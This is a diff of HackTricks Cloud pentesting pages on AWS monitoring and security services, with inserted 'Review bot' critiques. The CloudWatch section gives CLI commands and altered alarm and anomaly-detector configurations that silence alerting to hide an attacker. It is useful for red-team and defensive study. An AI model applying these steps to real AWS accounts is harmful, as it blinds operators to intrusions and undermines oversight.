permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents. + +In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete. + +```bash +aws cloudwatch put-metric-alarm --cli-input-json | --alarm-name --comparison-operator --evaluation-periods [--datapoints-to-alarm ] [--threshold ] [--alarm-description ] [--alarm-actions ] [--metric-name ] [--namespace ] [--statistic ] [--dimensions ] [--period ] +aws cloudwatch delete-alarms --alarm-names +aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [--no-actions-enabled | --actions-enabled [--alarm-actions ] [--insufficient-data-actions ] [--ok-actions ] ] +``` + +The following example shows how to make a metric alarm ineffective: + +* This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. 
+* By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. + +{% tabs %} +{% tab title="Original Metric Alarm" %} +```json +{ + "Namespace": "AWS/EC2", + "MetricName": "CPUUtilization", + "Dimensions": [ + { + "Name": "InstanceId", + "Value": "i-01234567890123456" + } + ], + "AlarmActions": [ + "arn:aws:sns:us-east-1:123456789012:example_sns" + ], + "ComparisonOperator": "GreaterThanThreshold", + "DatapointsToAlarm": 4, + "EvaluationPeriods": 6, + "Period": 300, + "Statistic": "Average", + "Threshold": 60, + "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", + "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" +} +``` +{% endtab %} + +{% tab title="Modified Metric Alarm" %} +```json +{ + "Namespace": "AWS/EC2", + "MetricName": "CPUUtilization", + "Dimensions": [ + { + "Name": "InstanceId", + "Value": "i-0645d6d414dadf9f8" + } + ], + "AlarmActions": [], + "ComparisonOperator": "GreaterThanThreshold", + "DatapointsToAlarm": 8640, + "EvaluationPeriods": 8640, + "Period": 10, + "Statistic": "Average", + "Threshold": 99, + "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", + "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" +} + +``` +{% endtab %} +{% endtabs %} + +**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. 
+ +### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`** + +By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response. + +In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. + +* If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. + +```bash +aws cloudwatch disable-alarm-actions --alarm-names +aws cloudwatch enable-alarm-actions --alarm-names +aws cloudwatch set-alarm-state --alarm-name --state-value --state-reason [--state-reason-data ] +``` + +**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. + +### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`** + +An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring. 
+ +```bash +aws cloudwatch delete-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat ] +aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat --configuration --metric-characteristics ] +``` + +The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period. + +{% tabs %} +{% tab title="Original Metric Anomaly Detector" %} +```json +{ + "SingleMetricAnomalyDetector": { + "Namespace": "AWS/EC2", + "MetricName": "CPUUtilization", + "Stat": "Average", + "Dimensions": [ + { + "Name": "InstanceId", + "Value": "i-0123456789abcdefg" + } + ] + } +} +``` +{% endtab %} + +{% tab title="Modified Metric Anomaly Detector" %} +```json +{ + "SingleMetricAnomalyDetector": { + "Namespace": "AWS/EC2", + "MetricName": "CPUUtilization", + "Stat": "Average", + "Dimensions": [ + { + "Name": "InstanceId", + "Value": "i-0123456789abcdefg" + } + ] + }, + "Configuration": { + "ExcludedTimeRanges": [ + { + "StartTime": "2023-01-01T00:00:00Z", + "EndTime": "2053-01-01T23:59:59Z" + } + ], + "Timezone": "Europe/Madrid" + } +} +``` +{% endtab %} +{% endtabs %} + +**Potential Impact**: Direct effect in the detection of unusual patterns or security threats. + +### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`** + +An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities. 
+ +```bash +aws cloudwatch delete-dashboards --dashboard-names +aws cloudwatch put-dashboard --dashboard-name --dashboard-body +``` + +**Potential Impact**: Loss of monitoring visibility and misleading information. + +### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`** + +Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team. + +```bash +aws cloudwatch delete-insight-rules --rule-names +aws cloudwatch put-insight-rule --rule-name --rule-definition [--rule-state ] +aws cloudwatch put-managed-insight-rules --managed-rules +``` + +**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures. + +### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`** + +By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity. + +```bash +aws cloudwatch disable-insight-rules --rule-names +aws cloudwatch enable-insight-rules --rule-names +``` + +**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts. 
+ +### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`** + +An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: + +* **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. +* **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. +* **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. + +Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. + +```bash +aws cloudwatch delete-metric-stream --name +aws cloudwatch put-metric-stream --name [--include-filters ] [--exclude-filters ] --firehose-arn --role-arn --output-format +aws cloudwatch put-metric-data --namespace [--metric-data ] [--metric-name ] [--timestamp ] [--unit ] [--value ] [--dimensions ] +``` + +Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance: + +```bash +aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg" +``` + +**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams. 
+ +### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`** + +An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams. + +```bash +aws cloudwatch stop-metric-streams --names +aws cloudwatch start-metric-streams --names +``` + +**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents. + +### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`** + +An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags. + +```bash +aws cloudwatch tag-resource --resource-arn --tags +aws cloudwatch untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of tag-based access control policies. + +## References + +* [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) +* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) +* [https://docs.aws.amazon.com/es\_es/AmazonCloudWatch/latest/monitoring/cloudwatch\_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md new file mode 100644 index 0000000000..3736b5511d --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md @@ -0,0 +1,72 @@ +# AWS - Config Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Config + +AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**. + +A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. + +* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. +* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance +* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. 
For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. +* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. +* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. + +**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. + +**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. + +**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. + +**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. 
+ +### Functioning + +* When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config +* Stores everything in S3 bucket +* Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings +* Lambda feeds back to Config +* If rule has been broken, Config fires up an SNS + +![](<../../../../.gitbook/assets/image (126).png>) + +### Config Rules + +Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ +AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. + +* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. +* **Custom rules**: You can create your own rules to check specific customconfigurations. + +Limit of 50 config rules per region before you need to contact AWS for an increase.\ +Non compliant results are NOT deleted. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
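Review bot: aws-config-enum.md carries no enumeration commands, which is what the page title promises; the "Functioning" or "Config Rules" section should at least show how to check whether a recorder is running in the current region and what it watches, e.g. `aws configservice describe-configuration-recorders`, `aws configservice describe-configuration-recorder-status` and `aws configservice describe-config-rules`, since the first thing an attacker wants to know is whether Config is recording where they are operating. Two factual points: "Each rule is essentially a lambda function" is only true for custom Lambda rules; AWS managed rules and Custom Policy (CloudFormation Guard) rules run without any Lambda, so the absence of a Lambda function is not evidence that a rule is inactive. And "Limit of 50 config rules per region" is an old quota that has been raised more than once, so the text should point the reader at Service Quotas rather than hard-code a number. Typos: "Ither information" (Other), "service principle" (principal), "customconfigurations", and "When make changes" in the Functioning list.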
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md new file mode 100644 index 0000000000..203439dda8 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md @@ -0,0 +1,72 @@ +# AWS - Control Tower Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Control Tower + +{% hint style="info" %} +In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them. +{% endhint %} + +AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. + +AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. + +With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. + +In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. + +Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. 
+ +### Enumeration + +For enumerating controltower controls, you first need to **have enumerated the org**: + +{% content-ref url="../aws-organizations-enum.md" %} +[aws-organizations-enum.md](../aws-organizations-enum.md) +{% endcontent-ref %} + +{% code overflow="wrap" %} +```bash +# Get controls applied in an account +aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ +``` +{% endcode %} + +{% hint style="warning" %} +Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts +{% endhint %} + +### Post Exploitation & Persistence + +{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %} +[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
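Review bot: In the Enumeration block of aws-control-tower-enum.md, the comment "# Get controls applied in an account" does not match the command: `list-enabled-controls --target-identifier` takes an organizational-unit ARN and returns the controls enabled on that OU (the accounts under it inherit them), so the comment should say OU. The example value `arn:aws:organizations:::ou/` also has an empty account field; an OU ARN carries the management account ID in that position, followed by the `o-` organization ID and the `ou-` identifier, which the reader needs to know to build the argument. In the intro hint, "managing each of the you can set policies from COntrol Tower" is missing the word "accounts" and has a stray capital. Minor: "AWS Single Sign-On (SSO)" is now IAM Identity Center and "guardrails" are now called "controls" in the console and API, which matters on this page because the CLI verb is `list-enabled-controls`.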
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md new file mode 100644 index 0000000000..588e24ab14 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -0,0 +1,41 @@ +# AWS - Cost Explorer Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cost Explorer and Anomaly detection + +This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ +Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. + +### Budgets + +Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ +Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
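Review bot: aws-cost-explorer-enum.md describes Cost Explorer, anomaly detection and Budgets but gives no way to enumerate them, so the page does not tell the reader how to find the cost alarms their activity might trip. Suggest adding at least `aws ce get-anomaly-monitors`, `aws ce get-anomaly-subscriptions` and `aws budgets describe-budgets --account-id <account-id>`, with the note that Budgets calls require the account ID and that anomaly and budget alerts are delivered by SNS or email, i.e. they are a detection source outside the compromised workload. Wording: "how are you expending money" should be "spending", and "when some anomaly in costs is found" reads better as "when an anomaly in costs is found".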
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md new file mode 100644 index 0000000000..35ff808ba5 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -0,0 +1,42 @@ +# AWS - Detective Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Detective + +**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. + +The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. + +## References + +* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) +* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
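Review bot: aws-detective-enum.md is description only; for an "Enum" page it should at least show how to tell whether Detective is enabled in the region and who feeds the behavior graph, e.g. `aws detective list-graphs` (an empty result means no graph, so Detective is off here) and `aws detective list-members --graph-arn <graph-arn>` to see which member accounts contribute. It would also help to make the dependency the prose hints at explicit: Detective builds on GuardDuty findings, CloudTrail and VPC Flow Logs, so it is often administered from the same delegated-administrator account as GuardDuty, which is the account an attacker should look for. Minor: "The service eases in-depth exploration" reads oddly; "enables" or "simplifies" fits better.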
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md new file mode 100644 index 0000000000..8c2d01c882 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -0,0 +1,330 @@ +# AWS - Firewall Manager Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Firewall Manager + +**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. + +The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. + +A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. + +AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: + +* **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. +* **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. 
